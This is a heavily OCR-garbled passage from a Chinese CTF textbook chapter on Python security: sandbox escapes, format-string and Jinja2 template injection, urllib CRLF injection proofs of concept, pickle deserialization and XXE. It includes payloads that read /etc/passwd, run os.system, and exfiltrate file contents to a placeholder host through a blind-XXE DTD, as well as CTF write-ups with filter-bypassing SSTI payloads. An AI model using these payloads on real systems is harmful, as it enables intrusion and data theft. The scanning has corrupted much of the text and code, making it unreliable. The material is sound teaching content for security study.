不 过 import 有 多 种 方法 ， 需 要 逐一 尝试 。 


>>> import os 

>>> __import__("os") 

<module 'os' from '/usr/local/Cellar/python@2/2.7.15/Frameworks/Python.framework 
/Versions/2.7/Lib/python2.7/os.pyc'> 

>>> import importlib 

>>> importlib.import_module("os") 

<module 'os' from '/usr/Llocal/Cellar/python@2/2.7.15/Frameworks/Python.framework 
/Versions/2.7/Lib/python2.7/os.pyc'> 


另外 ， 如 果 可 以 控制 Python 的 代码 ， 在 指定 目录 中 写 入 指定 文件 名 的 Python 文件 ， 也 许可 以 达到 才 
盖 沙 箱 中 要 调用 模块 的 目的 。 比 如 ， 在 当前 目录 中 写 入 random.py， 再 在 Python 中 import random 
时 ， 执 行 的 就 是 我 们 的 代码 。 例 如 : 


这 里 利用 的 是 Python 导入 模块 的 顺序 问题 ，Python 搜 索 模块 的 顺序 也 可 通过 sys.path 查 看 。 如 果 可 
以 控制 这 个 变量 ,我 们 可 以 方便 地 覆盖 内 置 模块 ， 通 过 修改 该 路 径 ， 可 以 改变 Python 在 import 模 块 
时 的 查找 顺序 ， 在 搜索 时 优先 找到 我 们 可 控 的 路 径 下 的 代码 ， 达 成 绕 过 沙 箱 的 目的 。 例 如 : 


>>> sys.path[-1] 
'/usr/Llocal/Cellar/protobuf/3.5.1_1/libexec/lib/python2.7/site-packages' 
>>> sys.path.append("/tmp/code") 

>>> sys.path[-1] 

'/tmp/code' 


除了 sys.path，sys.modules 是 另 一 个 与 加 载 模块 有 关 的 对 象 ， 包含 了 从 Python 开 始 运 行 起 被 导入 的 
所 有 模块 。 如 果 从 中 将 部 分 模块 设置 为 None， 就 无 法 再 次 引入 了 。 例 如 : 
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>>> sys.modules 
{'google': <module 'google' (built-in)>, 'copy_reg': <module 'copy_reg' from '/usr/local/ 
Cellar/python@2/2.7.15/Frameworks/Python.framework/Ve Ee ns/2. on IP yt 
y_reg.pyc'>, /us Re se ee ne2/ 
Eamon behon n.framework/Version 2 pe n2.7/sre_compile.pyc'>...} 


如 果 将 模块 从 sys.modules 中 剔除 ， 就 彻底 不 可 用 了 。 不 过 可 以 观察 到 ， 其 中 的 值 都 是 路 径 ， 所 以 可 
以 手动 将 路 径 放 回 ， 然 后 就 可 以 利用 了 。 


>>> sys.modules["os"] 
<module 'os' from '/usr/local/Cellar/python@2/2.7.15/Frameworks/Python.framework/Versions 


/2. ge ss n2.7/os.pyc' 
> sys.module a os"] = 

2 
Tra eeback (no st recent call last): 

File "<stdin>", line 1, in <module> 
ImportError: No module named os 

>> __import__("os") 
Traceback (most recent call last): 

File "<stdin>", line 1, in <module> 
ImportError: No module named os 


>>> sys.modules["os"] = "/usr/local/Cellar/python@2/2.7.15/Frameworks/Python.framework 
/Versions/2.7/Lib/python2.7/os.pyc" 
>>> import os 


同 理 ， 这 个 值 被 设置 为 可 控 模 块 也 可 能 造成 任意 代码 执行 。 


如 果 可 控 的 是 ZIP 文 件 ， 也 可 以 使 用 zipimport.zipimporter 实 现 上 面 的 效果 ， 不 再 鳌 述 


3.2.1.3 使 用 继承 等 寻找 对 象 
在 Python 中 ， 一 切 都 是 对 象 ， 所 以 我 们 可 以 使 用 Python 的 内 置 方法 找到 对 象 的 父 类 和 子 类 ， 如 []，_ 


C 
是 <class'list >，[]. class . mro 是 (<class'list >，<classobject >) ， mm[]. class . 


mro_[-1]._subclasses () 可 以 找到 object 的 所 有 子 类 。 


比如 ， 第 40 项 是 file 对 象 (实际 的 索引 可 能 不 同 ， 需 要 动态 识别 ) ， 可 以 用 于 读 写 文 件 。 


>>> [].__cLass__.__mro__[-1].__subcLasses__()[46] 
ee file'> 
> [].__class__.__mro__[-1].__subclasses__()[490]("/etc/passwd").read() 
stm Lee r Database\n# \n. 
builtin 


Python 中 直接 使 用 不 需要 import 的 函数 ， 如 open、eval 属 于 全 局 的 module_ builtins ， 所 以 可 以 
尝试 _builtins_.open(0 等 用 法 。 若 函数 被 删除 了 ， 还 可 以 使 用 reload(0 函 数 找 回 。 


File "<stdin>" ,Une 1 Ee ct i 
eError: 'moduLe' object has no attribute 'open' 
uiltins__.open 


le 
n__' (built-in)> 
n 


3.2.1.4 eval 类 的 代码 执行 


eval 类 函数 在 任何 语言 中 都 是 一 个 危险 的 人 存在， 我 们 可 以 在 Python 中 关 试 ， 可 以 通过 exec( (_ 
2) 、execfile()、eval()、compile()、input() (Python 2) 等 动态 执行 一 段 Python 代 和 码 。 


>>> input() 
open("/etc/passwd").read() 
'##\n# User Database\n# \n......" 


>>> eval('open("/etc/passwd").read()') 
'##\Nn# User Database\n# \n#......" 


3.2.2 格式 化 字符 捉 


cTF 的 Python 题目 中 会 涉及 Jinja2 之 类 的 模板 引 警 的 注入 。 这 些 漏洞 常常 由 于 服务 器 端 没有 对 用 户 的 
输入 进行 过 滤 ， 就 直接 带 入 了 服务 器 端 对 相关 页 面 的 泻 染 过 程 中 。 通 过 注入 模板 引擎 的 一 些 特 定 的 指 
令 格式 ， 如 {{1+1}} 返 回 了 2， 我 们 可 以 得 知 漏洞 存在 于 相关 Web 页 面 中 。 类 似 这 种 特性 不 仅 限 于 Web 
应 用 中 ， 也 存在 于 Python 原生 的 字符 串 中 。 


3.2.2.1 最 原始 的 % 
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如 下 代码 实现 了 登录 功能 ， 由 于 没有 对 用 户 的 输入 进行 过 滤 ， 直 接 带 入 了 print 的 输出 过 程 ， 从 而 导致 
了 用 户 密码 的 泄露 。 


serdata = {"user" MS 
passwd = raw_inpu ut Pas on ee 


if passwd != userdata["password"]: 
print ("Password " + passwd + " is Wrong for user %(user)s") % userdata 


比如 ， 用 户 输 入 “% a 5 a 


3.2.2.2 format 方 法 相关 
上 述 的 例子 还 可 以 使 用 format 方 法 进行 改写 ( 仅 涉 及 关键 部 分 ) : 


此 时 若 passwd="{password}”， 也 可 以 实现 3.2.2.1 节 中 获取 用 户 真 实 密码 的 目的 。 除 此 之 外 ， 
方法 还 有 其 他 用 途 。 例 如 ， 以 下 代码 


会 先 把 0 蔡 换 为 format 中 的 参数 ， 再 继续 获取 相关 的 属性 。 由 此 我 们 可 以 获取 代码 中 的 敏感 信息 。 


下 面 引用 来 自 于 http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/ 的 例子 : 


CONFIG = { 
'SECRET_KEY': 'super secret Key' 
} 


class Event(object): 
def __init__(self, id, level, message): 


self.level = level 
self.message = message 


def format_event(format_string, event): 
return format_string.format(event=event) 


如 果 format string 为 {event.。init . globals [CONFIG][SECRET KEY]}， 就 可 以 泄露 敏感 信息 。 


理论 上 ， 我 们 可 以 参考 上 文 ， 通 过 类 的 各 种 继承 关系 找到 想 要 的 信息 。 


3.2.2.3 Python 3.6 中 的 停 符 串 


Python 3.6 中 新 引入 了 f-strings 特 性 ， 通 过 f 标 记 ， 让 字符 串 有 了 获取 当前 context 中 变量 的 能 力 。 例 
如 : 


> import 0 
> f"{o0s.system('ls')}" 
etc lib media proc run 
e Linuxrc mnt root sbin sys 


>>> f"{f(Lambda x: x - 10)(100)}" 
199 


但 是 目前 没有 把 普通 字符 串 转 换 为 停 符 串 的 方法 ， 也 就 是 说 ， 用 尸 可 能 无 法 控制 一 个 {字符 串 ， 可 能 
无 法 利用 。 


3.2.3 Python 模板 注入 


Python 的 很 多 Web 应 用 涉及 模板 的 使 用 ， 如 Tornado、Flask、Django。 有 时 服务 器 端 需要 向 用 户 
端 发 送 一 些 动态 的 数据 。 与 直接 用 字符 串 拼 接 的 方式 不 同 ， 模 板 引 警 通过 对 模板 进行 动态 的 解析 ， 将 
传 入 模板 引擎 的 变量 进行 替换 ， 最 终 展示 给 用 户 。 


SSTI 服 务 端 模 板 注 入 正 是 因为 代码 中 通过 不 安全 的 字符 串 拼接 的 方式 来 构造 模板 文件 而 且 过 分 信任 了 
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EA PF 四 J 时 澳 \ 丰 
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板 ， 这 个 模板 通过 字符 串 拼接 而 构造 ， 而 且 用 户 输入 的 数据 会 影响 字符 串 拼接 过 程 。 


下 面 以 Flask 为 例 (与 Tornado 的 模板 语法 类 似 ， 这 里 只 关注 如 何 发 现 关 键 的 漏洞 点 ) 。 在 处 理 怀疑 合 
有 模板 注入 的 漏洞 的 网 站 时 ， 先 关注 render_* 这 类 函数 ， 观 察 其 参数 是 否 为 用 户 可 控 。 如 果 存 在 模板 
文件 名 可 控 的 情况 ， 如 


render_template(request.args.get('template_name'), data) 


配合 上 传 漏洞 ， 构 造 模 板 ， 则 完成 模板 注入 。 


对 于 下 面 的 例子 ， 我 们 应 先 关注 render template string (template) 国 数 ， 其 参数 template 通 过 
格式 化 字符 串 的 方式 构造 ， 其 中 request.url 没 有 任何 过 滤 ， 可 以 直接 由 用 户 控制 。 


from flask import Flask 

from flask import render_template 

from flask import request 

from flask import render_tempLate_string 


app = FLask(__name__) 
@app.route('/test',methods=['GET', 'POST']) 
def test(): 
template = ''" 
<div class="center-content error"> 
<hl>0ops! That page doesn't exist.</hl> 
<h3>%s</h3> 
</div> 
''! %(request.url) 


return render_template_string(template) 


if __name__ == '__main__': 
app.debug = True 
app.run() 


那么 直接 在 URL 中 传 入 恶意 代码 ， 如 “{{sel 人 fj)}”， 拼 接 至 template 中 。 由 于 模板 在 演 染 时 服务 器 会 
自动 寻找 服务 器 泻 染 时 上 下 文 的 有 关内 容 ， 因 此 将 其 填充 到 模板 中 ， 就 导致 了 敏感 信息 的 泄露 ， 甚 至 
执行 任意 代码 的 问题 。 


通过 在 本 地 搭建 与 服务 器 相同 的 环境 ， 查 看 泻 染 时 上 下 文 的 信息 ， 这 时 最 简单 的 利用 是 用 {{ 


Variable 
人 } 将 上 下 文 的 变量 导出 ， 更 好 的 利用 方式 是 找到 可 以 直接 利用 的 库 或 函数 ， 或 者 通过 上 文 提 到 的 继承 
等 寻找 对 象 的 手段 ， 从 而 完成 任意 代码 的 执行 。 


3.2.4 urlllb 和 SSRF 


Python 的 urllib 库 (Python 2 中 为 urllib2，Python 3 中 为 urllib) 有 一 些 HTTP 下 的 协议 流 注 入 漏洞 。 
如 果 攻 击 者 可 以 控制 Python 代码 访问 任意 URL， 或 者 让 Python 代码 访问 一 个 肪 意 的 Web Server， 那 
么 这 个 漏洞 可 能 危害 内 网 服务 安全 。 


对 于 这 类 漏洞 ， 我 们 主要 关注 服务 器 采用 的 Python 版 本 是 否 存 在 相应 的 漏洞 ， 以 及 攻击 的 目标 是 否 会 
受到 SSRF 攻 击 的 影响 ， 如 利用 某 个 图 片 下 载 的 Python 服 务 去 攻击 内 网 部 署 的 一 台 未 加密 的 Redis 服 


务 器 。 


3.2.4.1 CVE-2016-5699 


CVE-2016-5699: Python 2.7.10 以 前 的 版 本 和 Python 3.4.4 以 前 的 3.x 版 本 中 的 urllib2 和 urllib 中 的 
HTTPConnection.putheader 函 数 人 存在 CRLF 注 入 漏洞 。 远 程 攻 击 者 可 借助 URL 中 的 CRLF 序 列 ， 利 
用 该 漏洞 注入 任意 HTTP 头 。 
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在 HTTP 解 析 host 的 时 候 可 以 接收 urlencode 编 码 的 值 ， 然 后 host 的 值 会 在 解码 后 包含 在 HTTP 数 据 流 
中 。 这 个 过 程 中 ， 由 于 没有 进一步 的 验证 或 者 编码 ， 就 可 以 注入 一 个 换行 符 。 


例如 ， 在 存在 漏洞 的 Python 版 本 中 运行 以 下 代码 : 


import sys 

import urllib 

import urllib.error 
import urllib.request 


url = sys.argv[1] 


try: 
info = urllib.request.urlopen(url).info() 
print(info) 

except urllib.error.URLError as e: 
print(e) 


其 功能 是 从 命令 行 参 数 接收 一 个 URL， 然 后 访问 已 。 为 了 查看 urllib 请 求 时 发 送 的 HTTP 头 ,我 们 用 nc 
命令 来 监听 端口 ， 坦 看 该 端口 收 到 的 数据 。 


此 时 向 127.0.0.1:12345 发 送 一 个 正常 的 请 求 ， 可 以 看 到 HTTP 头 为 : 


GET /foo HTTP/1.1 
Accept-Encoding: identity 
ent: Python-urllib/3.4 
nnection: close 
Host: 127.0.0.1:12345 


然后 我 们 使 用 恶意 构造 的 地 址 


./poc.py http://127.9.0.1%9d%6aX-injected:%20header%gd%0ax-Leftover:%20:12345/foo 
可 以 看 到 HTTP 头 朗 成 了 : 


GET /foo HTTP/1.1 
Accept-Encoding: identity 
User-Agent: Python-urllib/3.4 
Host: 127.0.0.1 

X-injected: header 
Xx-Leftover: :12345 
Connection: close 


对 比 之 前 正常 的 请 求 亡 式 ，X-injected: headel 行 是 新 增 的 ,这样 束 造成 了 我 们 可 以 使 用 类 似 SSRF 


攻击 手法 的 方式 ， 攻 击 内 网 的 Redis 或 其 他 应 用 。 


除了 针对 IP， 这 个 攻击 漏洞 在 使 用 域名 的 时 候 也 可 以 进行 ， 但 是 要 插入 一 个 空 字 节 才 能 进行 DNS 查 
询 。 比 如 ，URL:http://localhost%0d%0ax-bar:%20:12345/foo 进 行 解析 会 失败 的 ， 但 是 i 
tt 
TJ) Te] | ToT TA Te AOE DE ET PA PRY TIL oT ET a A 


注意 ，HTTP 重 定向 也 可 以 利用 这 个 漏洞 ， 如 果 攻 击 者 提供 的 URL 是 恶意 的 Web Server， 那 么 服务 器 
可 以 重 定向 到 其 他 URL， 也 可 以 导致 协议 注入 。 


3.2.4.2 CVE-2019-9740 


CVE-2019-9740: Python urllib 同 样 存在 CRLF 注 入 漏洞 ， 攻 击 者 可 通过 控制 URL 参 数 进 行 CRLF 注 
入 攻击 。 例 如 ， 我 们 修改 上 面 CVE-2016-5699 的 poc， 就 可 以 复 现 了 


import sys 

import urllib 

import urllib.error 
import urllib.request 


host = "127.0.0.1:1234?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123" 
url = "http://"+ host + ":8080/test/?test=a" 


try: 
info = urllib.request.urlopen(url).info() 
print(info) 

except urllib.error.URLError as e: 
print(e) 


可 以 看 到 ，HTTP 头 如 下 : 


GET /?a=1 HTTP/1.1 

CRLF-injection: test 

TEST: 123:8080/test/?test=a HTTP/1.1 
Accept-Encoding: identity 

Host: 127.0.0.1:1234 

User-Agent: Python-urllib/3.7 
Connection: close 
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3.2.5 Python 反 序列 化 
肥 序 列 化 onl a Python 也 不 例外 。 在 反 序列 化 的 过 程 中 ， 由 于 反 序 列 化 


EA:SESNE NE :Dl EN LDN: EST=b DN dE 
任意 代码 执行 的 问题 。Python 中 可 能 存在 问题 的 库 有 pickle、cPickle、PyYAML， 其 中 应 该 重点 天 注 
的 方法 如 下 : pickle.load()，pickle.loads()，cPickle.load()，cPickle.loads()，yaml.load()。 下 面 重 
所 计 论 pickle 的 用 法 ， 其 他 反 序 列 化 方法 类 似 。 


pickle 中 存在 _reduce 魔术 方 法， 来 决定 类 如 何 进 行 反 序列 化 。_reduce 方法 返回 值 为 长 度 一 个 
2 ~ 5 的 元 组 时 ， 将 使 用 该 元 组 的 内 容 将 该 类 的 对 象 进行 序列 化 ， 其 中 前 两 项 为 必 填 项 。 元 组 的 内 容 的 
第 一 项 为 一 个 callable 的 对 象 ， 第 二 项 为 调用 callable 对 象 时 的 参数 。 比 如 通过 如 下 exp， 将 生成 在 反 
序列 化 时 执行 os.system ("id") 的 payload。 在 用 户 对 需要 进行 反 序 列 化 的 字符 串 有 控制 权时 ， 将 
传 入 ， 就 会 导致 _ 些 问题 。 例 如 ， 将 以 下 反 序 列 化 产生 的 结果 直接 传 入 pickleloads0， 则 会 所 ” 


行 os.system ("id") 。 


d 


import pickle 
import os 


class test(object) : 
def __r 


payload = pickle.dumps(test()) 


print(payload) 
# python3: 默认 Protocol 版 本 为 3， 不 兼容 python 2 
# b'\x89\x93cnt\nsystemNnqN\x60XN\x92\x99\x09\x66idq\x91\x85qN\x92Rq\x693.， 


pickle 中 存在 很 多 opcode， 通 过 这 些 opcode， 构 造 调用 栈 ， 我 们 可 以 实现 很 多 其 他 功能 。 比 如 
-breaking 2018 中 涉及 一 道 反 序列 化 的 题目 ， 在 反 序列 化 阶段 限制 了 可 供 反 序列 化 的 库 ，_ 

_ 只 能 实现 对 一 个 函数 的 调用 ， 于 是 需要 手工 编写 反 序列 化 的 内 容 ， 以 完成 对 过 滤 的 绕 过 及 任意 代 ” 

码 执行 的 目的 。 


3.2.6 Python XXE 


无 论 什 么 语言 ， 在 涉及 对 XML 的 处 理 时 都 有 可 能 出 现 XXE 相 关 漏 洞 ， 于 是 在 审计 一 段 代 码 中 是 否 存 在 
XXE 漏 洞 时 ， 最 主要 的 是 找 对 XML 的 处 理 过 程 ， 关 注 其 中 是 否 禁 用 了 对 外 部 实体 的 处 理 。 比 如 ， 对 于 
某 个 Web 程 序 ， 通 过 请 求 头 中 的 Content-type 判 断 用 户 输 入 的 类 型 ， 为 JSON 时 调用 JSON 的 处 理 方 
法 ， 为 XML 时 调用 XML 的 处 理 方法 ， 而 这 个 过 程 中 刚好 没有 对 外 部 实体 进行 过 滤 ， 这 就 导致 了 在 用 户 
输入 XML 时 的 XXE 问 题 。 


XXE 束 是 XML Entity (实体 ) 注入 。Entity (实体 ) 的 作用 类 似 Word 中 的 “ 安 ”， 用 尸 可 以 预定 义 
一 个 Entity， 再 在 一 个 文档 中 多 次 调用 ， 或 在 多 个 文档 中 调用 同一 个 Entity。XML 定 义 了 两 种 Entity : 
普通 Entity， 人 在 XML 文档 中 使 用 ; 参数 Entity， 在 DTD 文 件 中 使 用 。 


在 Python 中 处 理 XML 最 冲 用 的 融 是 xml 库 ， 我 们 需要 天 注 其 中 的 parse 方 法 ， 碍 看 输入 的 XML 是 个 直 

接 处 理 用 户 的 输入 ， 是 人 否 鞭 用 了 外 部 实体 ， 即 审计 时 的 重点 。 但 是 ，Python 从 3.7.1 碑 开始 ， 默 认 茎 

止 了 XML 外 部 实体 的 解析 ， 所 以 在 审计 时 也 要 注意 版 本 。 具 体 xml 库 存在 的 安全 问题 ， 读 者 可 以 下 赔 
库 的 官方 文档 : https://docs.python.org/3/library/xml.html, 


下 述 代码 中 包含 两 段 XXE 常 见 的 payload， 分 别 用 于 读 取 文 件 和 探测 内 网 ， 再 通过 Python 对 其 中 的 、， | 
进行 解析 。 代 码 本 身 没有 对 外 部 实体 进行 限制 ， 从 而 导致 了 XXE 漏 洞 。 


# coding=utf-8 
import xmL.sax 


x = """<?xmL version="1.0" encoding="utf-8"?> 
<!DOCTYPE xdsec [ 
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<!ELEMENT methodname ANY > 

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
<methodcaLL> 

<methodname>&xxe;</methodname> 

</methodcall> 


x1 = """<?xml version="]1.0" encoding="utf-8"?> 
<!DOCTYPE xdsec [ 
<1ELEMENT methodname ANY > 
<!ENTITY xxe SYSTEM "http://127.0.0.1:8005/xml.test" >]> 
<methodcall> 
<methodname>&xxe;</methodname> 
</methodcall> 


class MyContentHandler(xml .sax.ContentHandler): 
def __init__(self): 
xml.sax.ContentHandler.__init__(self) 


def startElement(self, name, attrs): 
self.chars = "" 


def endElement(self, name): 
print name, self.chars 


def characters(self, content): 
self.chars += content 


parser = MyContentHandler() 
print xml.sax.parseString(x, parser) 
print xml.sax.parseString(x1, parser) 


运行 这 段 代 码 ， 融 可 以 打印 出 /etwpasswd 的 内 容 ， 而 且 127.0.0.1:8005 可 以 收 到 一 个 HTTP 请 求 。 


$ nc -~L 8005 

GET /xmL.test HTTP/1.0 

Host: 127.0.0.1:8005 
User-Agent: Python-urllib/1.17 
Accept: */* 


除了 这 种 情况 ， 有 时 源 程 序 在 解析 完 XML 数 据 后 ， 并 不 会 将 其 中 的 内 容 进行 输出 ， 此 时 无 法 从 返 
果 中 获取 我 们 需要 的 内 容 。 在 这 种 情况 下， 我们 可 以 利用 Blind XXE 作 为 攻击 方式 ， es 
实体 的 各 种 操作 ， 攻 击 载 何如 下 所 示 。 


<!DOCTYPE updateprofile[ 

<!ENTITY % file SYSTEM "file:///etc/passwd"> 
<!ENTITY % dtd SYSTEM "http://xxx/evil.dtd"> 
%dtd; 

%send ; 

]> 


先 用 file:// 或 php://filter 获 取 目 标 文 件 的 内 容 ， 然 后 将 内 容 以 http 请 求 友 送 到 接收 数据 的 服务 器 。 由 
不 能 在 实体 定义 中 引用 参数 实体 ， 因 此 我 们 需要 将 抱 套 的 实体 声明 放 到 一 个 外 部 dtd 文 件 中 ， 如 下 
文 的 eval.dtd。 


evaL .dtd: 
<!ENTITY % all 
"<1ENTITY &#x25 send SYSTEM ‘http://xxx.xxx.xxx.xxx/?data=%file;'" 


> 
% all; 


A EE/ Ee 
待 ， 此 时 需要 通过 CDATA 将 数据 进行 包 里 ， 最 终 实现 外 市 。 由 于 在 互联 网 上 有 很 多 相关 资料 ， 故 不 在 
此 处 做 更 多 介绍 ，。 


3.2.7 sys.audit 


2018 年 6 月 ，Python 的 PEP-0578 新 增 了 一 个 审计 框架 ， 可 以 提供 给 测试 框架 、 日 志 框 架 和 安全 工 
具 ， 来 监控 和 限制 Python Runtime 的 行为 。 


Python 提供 了 对 许多 单 见 操作 系统 的 各 种 底层 功能 的 访问 方式 。 昌 然 这 对 于 “一 次 编写 ， 随 处 运行 ” 
脚本 非 曲 有 用 ， 但 使 监控 用 Python 编写 的 软件 变 得 困难 。 由 于 Python 本 机 原生 系统 API， 因 此 现 有 的 
监控 审计 开具 要 人 么 上 下 又 信 息 是 受 限 的 ， 和 要 么 会 目 接 伏 完 过 


上 下 文 受 限 是 捐 ， 系 统 监 视 可 以 报告 友 生 了 某 个 操作 ， 但 无 法 解释 导致 该 操作 的 事件 序列 。 例 如 ， 系 
统 级 别 的 网 络 监视 可 以 报告 “开始 侦 听 在 端口 5678” ， 但 可 能 无 法 在 程序 中 提供 进程 ID、 命 令 行 参 


效 、 父 进程 等 信息 。 
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计 绕 过 是 指 ， 一 个 功能 可 以 使 用 多 种 方式 完成 ， 监 控 了 一 部 分 ， 使 用 其 他 的 就 可 以 绕 过 。 例 如 ,在 
计 系 统 中 专门 监视 调用 curl 砾 出 HTTP 请 求 ， 但 Python 的 urlretrieve 了 为数 没 有 被 监控 。 


审 
审 1 


另外 ， 对 于 Python 有 点 独特 的 是 ， 通 过 操纵 导入 系统 的 搜索 路 径 或 在 路 径 上 放置 文件 而 不 是 预期 的 文 
件 ， 很 容易 影响 应 用 程序 中 运行 的 代码 。 当 开发 人 员 创 建 与 他 们 打算 使 用 的 模块 同名 的 脚本 时 ， 通 常 
会 出 现 这 种 情况 。 例 如 ， 一 个 random.py 文 件 党 试 导 入 标准 库 random ， 实 际 上 执行 的 是 用 户 的 


ie[eiil 
.Py。 


3.2.8 CTF Python 案例 


3.2.8.1 星 家 线 上 赌场 (SWPU 2018) 


题目 是 一 个 Flask Web ， 通 过 任意 文件 读 取 获 取 views.py 的 代码 : 


def register_views(app): 
@app.before_request 
def reset_account(): 
if request.path == '/signup' or request.path == '/Login' : 
return 
uname = username=session.get('username') 
u = User.query.filter_by(username=uname) .first() 
Ls 
gu=u 
g.fLag = 'swpuctf{xxxxxxxxxxxxxx}" 
if uname == 'admin' : 
return 
now = int(time()) 
if (now - u.ts >= 600): 
u.balance = 10000 
u.count = 0 
u.ts = now 


u.save() 
session['balance'] = 10060 
session['count'] = 0 


@app.route('/getflag', methods=('POST',)) 
Q@Login_required 
def getflag(): 
u = getattr(g, 'u') 
if not u or u.balance < 1000000: 
return ‘'{"s": -1, "msg": "error"}' 
field = request.form.get('field', 'username') 
mhash = hashlib.sha256(('swpu++{0.' + field + '}').encode('utf-8')).hexdigest() 
jdata = '{{"{0}":" + '"{1.' + field + '}", "hash"”: "{2}"}}" 
return jdata.format(field, g.u, mhash) 


_init _ .py 文件 内 容 如 下 : 


from fLask import FLask 

from flask_sqlalchemy import SQLALchemy 
from .Views import register_views 

from .modeLs import db 


def create_app() : 
app = Flask(__name__, static_folder='') 
app.secret_key = '9f516783b42730b7888008dd5c15fe66' 
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db' 
register_views(app) 
db.init_app(app) 
return app 


然后 使 用 得 到 的 secret key， 我 们 可 以 伪造 Session， 生 成 一 个 符合 getflag 条 件 的 Session。 


getflag 的 format 可 以 直接 注入 一 些 数据 ， 但 是 需要 跳出 g.u， 题 目 中 给 了 提示 : 为 了 方便 ， 给 user 写 
了 save 方 法 ， 所 以 直接 使 用 globals ”跳出 得 到 flag，payload 见 图 3-2-1。 


a http://107.167.188.24Wgettlag 


冲 | 

© En Post te a Er 
中 有 站 
post date ml 


Cr 
3-2-1 


3.2.8.2 mmmmy (网 见 杯 2018 线 上 赛 ) 


伪造 JWT 登 入 后 是 一 个 留言 功能 ， 友 现 输入 的 东西 都 会 原原本本 地 打印 在 页 面 上 ， 于 是 猜测 这 是 一 个 
SSTI。 测 试 后 友 现 过 滤 了 很 多 忒 西 , 如 “”“"” "0s”“_”“{{” 等 ， 只 要 出 现 了 这 举 关 键 字 ,项 
直接 打印 None。 昌 然 过 滤 了 “{{”， 但 是 可 以 使 用 “{%”， 如 “{%if 1%}1{%endif%}” 会 打印 
"1 


我 们 思考 需要 绕 过 的 地 方 。 首 先 “_ ”被 过 滤 ， 可 以 使 用 “[]” 结 合 request 来 绕 过 ,如 “{%if0[ 
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.args.a]%}”，URL 中 的 “/bbs? a= class ”。 然 后 可 以 构造 一 个 读 取 文 件 的 payload : 
request 


GET 
a=__class__&b=__base__&c=__subclasses___&d=pop&e=/flag 


POST 


{%if ()[request.args.al][request.args.b][request.args.c]()[request.args.d](40) 
(request.args.e).read()[0:1]==chr(102) %}~mmm~{%endif%} 


但 是 报 了 500 错 误 ， 考 虑 是 没有 chr 了 为数 。 那 么 如 法 炮制 ， 获 取 chr 邹 数 : 


GET 
a=__class__&b=__base__&c=__subclasses__&d=pop&e=/flag&al=__init__&a2=__globals__&a3=__builtins__ 


POST 


{%set chr=()[request.args.a][request.args.b][request.args.c]()[59][request.args.all] 
[request .args.a2] [request.args.a3] .chr %} 


然后 可 以 使 用 脚本 进行 盲 注 ， 见 图 3-2-2。 
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图 3-2-2 ( 续 ) 
除了 盲 注 ， 还 有 一 种 方法 可 以 直接 打印 明文 ， 即 使 用 jinja2 中 的 print， 见 图 3-2-3。 打 印 结果 见 图 3-2 
A 


_statement_keywords = frozenset(['for', 'if', 'block', ‘extends ,| “PDFEn 7 
‘macro', 'include', 'from', 'import™, 
'set', 'with', 'autoescape']) 

_Compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq']) 


[Target | Proxy | Spider | Scanner [Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Aler | 
ll 
ee ETAIETD Target http://d08b58469e784ebe8a927e591077b7cdbfsdc625d9f848bb.game.ichunqiu.com | 司 | 引 


equest Response 


JRaw | Headers | Hex | HTML | Render 


I& | <body> 4 











/bbs?a"__class._8&b*__base__&c"__subclasses._&d"pop&e"/flog&oal=__init__&a2= 

--gtobols__&o3=__buiittins-- HTTP/1,.1 <div class*"container"> 

Host: 618ebo03c5d8411bbc893f5b898580d1269ed78745804006 .gome ,ichunqiu.com <div closs* "heoder cleorfix"> 

Content-Length: 112 ow 

Coche-Control: maox-oge“0 <ul closs*"nav nov-pills pull~right"> 
Origin: 
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Content-Type: 0ppltcotior/x-wWwwm-form-Urtencoded 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0S X 10_13.6) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1865 Sofari/537.%6 
Accept: 

text/html ,opplication/xhtml+xml ,opplication/xml;q"0.9,imoge/webp ,imoge/apn 
9,"/";9"0.8 

Referer: 

http://d08b58469e784ebe8a927e591077b7cdbf5dc625d9f848bb .gane.ichunqiu.com/ 
bbs 

Accept-Encoding: gzip, deflate 

Accept-Longuoge: zh-CN,zh;q"0.9,en;q"0.8 

Cookie: 
session"eyJsb2dpbl9pbi162mF sc2YV9 .DmY? Ww. 3mK28GkcNccwkd_Ihy-fFtTG_k4; 
token=eyjJhbGct0tJIUzI1NtISInRScCI6IkpXVCJ9.ey]lc2VybmFt25I6ImFkbWtuIno .IXE 
kNeS2X4vypUsNeRFbhbXU4KE4winxIhrpPiWp0P 沪 

Connection: close 


text={% print 
()[request.args.o][request.orgs.b][request.args.c]()[request.args.d](40Xr 
equest.args.e).reod() 知 


国 国 国 国 人 
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| <li role*"presentotion"><o 
href=*/index "> 用 户 中 心 </a></1i> 
| <li role""presentation"><o 
href= "/bbs"> 留 言 </G></ii> 
<li role="presentation"><a 
href="/1ogout"> 注 销 </o></1i> 
| 


</ul> 
| </now> 
<h} closs="text-muted">CTF</h3> 
</div> 


<div closs* jumbotron "> 
pflog{d22b04db0-c0f0-4435-0074-Qeoe95f7b3ce} 


</div 
</divw> 


</div 本 ~ /Contoiner -=> 


</body> 
</htal> 


国 国 国 四 人 [reeoem | omaches 


1,286 bytes | 33 millis 


图 3-2-4 
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3.3 密码 学 和 逆 同 知识 


加 密 算法 与 伪 随 机 数 算法 是 开发 中 经 常用 到 的 东西 ， 在 CTF 比 赛 中 也 是 。 除 了 CRYPTO 分 类 下 对 密码 
算法 纯粹 的 考虑 ，Web 题 目 也 会 涉及 密码 学 的 使 用 ， 最 常见 的 有 对 敏感 信息 如 密码 或 用 户 凭据 进行 加 
密 保 存 、 对 重要 信息 的 校 验 等 。 这 些 过 程 中 可 能 隐藏 着 一 些 对 密码 学 的 错误 使 用 ， 比 赛 过 程 中 在 成 功 
伪造 出 我 们 需要 的 信息 后 ， 配 合 其 他 漏洞 ， 最 终 可 获取 flag。 


除了 密码 学 ， 对 源码 进行 混淆 加 密 也 是 正常 操作 。 利 用 Python、PHP、Javascript 等 语言 的 特性 ， 比 
赛 题目 将 代码 变 成 不 那么 直观 的 样子 ， 加 大 了 分 析 难 度 ， 但 是 只 要 掌握 了 方法 ， 参 赛 者 也 能 很 快 分 析 
出 藏 在 混淆 背后 的 秘密 。 


